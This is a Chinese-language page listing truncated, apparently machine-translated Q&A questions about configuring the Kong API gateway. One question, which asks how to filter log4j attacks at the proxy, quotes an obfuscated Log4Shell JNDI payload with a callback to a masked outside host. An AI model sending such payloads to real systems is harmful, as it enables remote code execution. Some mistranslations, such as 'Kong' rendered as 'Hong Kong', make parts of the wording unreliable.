kong
Konga:如何在 Konga docker 镜像中配置管理员用户帐户和 Kong 连接?
我在用孔加在 Kubernetes 集群上使用 Helm 图表。 这最终使用Konga 官方图片(孔加),这似乎不支持配置管理员帐户或 Kong 连接。 最简单的方法是什么? 我正在考虑将该信息注入其 localDb 文件/app/kongadata/konga.db(这是一个 JSON 文件)。 或者也许使用数据库 PostgreSQL 会更容易? 谢谢。 ...
kong
kong
如何使用记录的 config.custom_fields_by_lua 选项在 Kong api 网关的 http-log 插件中获取 http 请求/响应主体?
免责声明 这是一个讨论得很好的话题,但似乎还没有解决方案。这个似乎是一个过时的重复,不要因此而评判我。 https://discuss.konghq.com/t/logging-request-body-response-body-with-http-log/1205 无论如何,这里没有config.custom_fields_by_lua讨论。还有一些过时的解决方法https://stackoverflow.com/questions/72337619/kong-gateway-request-and-response-body 问题 当我将其添加到kon...
kong
使用 kong 的 dns(udp)代理
我需要根据主机名代理 DNS 请求。 我已将 Kong 配置为流式传输 53 udp。 我可以创建服务: curl -X POST http://localhost:8001/services \ -H "Content-Type: application/json" \ -d '{"name":"jerry", "protocol":"udp", "host": "jerry-coredns", "port": 53}' 但是当尝试根据主机名创建路由时: curl -X POST http://localhost:8001/services/jerry...
kong
在 Kong Konnect 中表示环境的内在方式是什么?
我在 Google 上搜索了许多不同的术语组合,以找出 Kong Konnect 希望系统管理员使用哪些概念和功能来表示不同的环境(例如分阶段、生产)和租户(例如美国、加拿大),但无济于事。 我能找到的唯一文档(来自 Kong 自己)建议使用多个运行时组,但这需要企业订阅;考虑到这种环境分离是许多公司(无论大小)都采用的非常常见的模式,因此这对我来说似乎是小事一桩。 我能看到的唯一其他方法是避免在服务中心关联上游 URL,而是利用每个环境一个网关服务(例如public-api-staging,public-api-production)在单个运行时组内,以及...
kong
Kong-proxy 在 Jelastic 环境中不起作用
我们需要一些帮助来尝试在 Jelastic 环境内的 Kubernetes 中安装 Kong。我和我的同事有一个基于生产的 kubernetes 集群,其中包含以下内容: 负载均衡器 1 个具有公共 IP 的节点 工人 2 个节点 贮存 3 个具有 NFS 存储的节点 控制平面 3 个节点 默认情况下,此环境可以很好地ingress-nginx加载Hello Kuberenetes应用程序。以下是 ingress-nginx hello kubernetes 示例的配置: apiVersion: networking.k8s.i...
kong
如何解决 Kong Gateway 上“从上游服务器收到无效响应”?
我正在使用带有 Compose 的 docker 并创建了一些微服务,并尝试通过 Kong Gateway 连接它们。 为了使用 PHP 访问 MS,我在 Nginx 中创建了反向代理,我可以通过以下 URL 示例进行访问: http://service1.localhost:8081 (Laravel with PHP MS) http://service2.localhost:8081 (Laravel with PHP MS) http://service3.localhost:8081 (Laravel with PHP MS) http://fr...
kong
使用 kong 反向代理过滤 log4j 漏洞
我正在使用香港反向代理代理我的 Web 服务器的每个 HTTP 请求。我想缓解当前的 log4j 问题 ("log4shell通过查找并替换关键攻击者的字符串(如“jndi”),我能够轻松找到问题根源。例如,我在日志中发现了以下内容: ${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback} 我认为这可以通过使用请求转换器插件。有人已经这样做了吗? PS:仅仅jndi用 来替换disabled太过深远而且会破坏很多东西。 ...
kong
没有默认网关,Kong DNS 解析失败
我正在尝试向端点发送请求/v1/resource,但收到以下错误: 2021/06/02 23:17:17 [crit] 30#0: *2963 connect() failed (101: Network unreachable), context: ngx.timer, client: 172.13.0.21, server: 0.0.0.0:8443 2021/06/02 23:17:18 [crit] 30#0: *2969 connect() failed (101: Network unreachable), context: ngx.timer...
kong
GCP HTTP 负载均衡器到 TCP 负载均衡器
我试图弄清楚如何在 GCP 中将 TCP 负载均衡器与 HTTP/HTTPS 负载均衡器连接起来。 我已经在 GKE 集群上安装了 kong,它创建了一个 TCP 负载均衡器。 现在,如果我有多个带有 Kong 的 GKE 集群,它们都将拥有自己的 TCP 负载均衡器。 从用户的角度来看,我需要进行 DNS 负载平衡,但这并不总是有成效的。 因此,我试图弄清楚是否可以使用 Cloud CDN、NEG 和/或 HTTP/HTTPS 负载均衡器作为 Kong 的 TCP 负载均衡器的前端。 有可能吗?还有其他选择吗? ...
kong
KONG/NGINX 将证书信息传递给 APACHE
我们已设置 Kong API 网关(在后台运行 NGINX),其中一个上游是 apache 服务器,我们想要在其上进行客户端证书验证。 我正在运行测试,curl我请求 kong(nginx),他将请求转发给 apache。我正在使用curl --cert cert.crt --key key.key "https://kongurl.com/blabla" 在 nginx 端,我设置了一个自定义日志来查看证书(至少是序列号)是否正在发送,并且我可以看到它: log_format combined_sslclient '$remote_addr - $remo...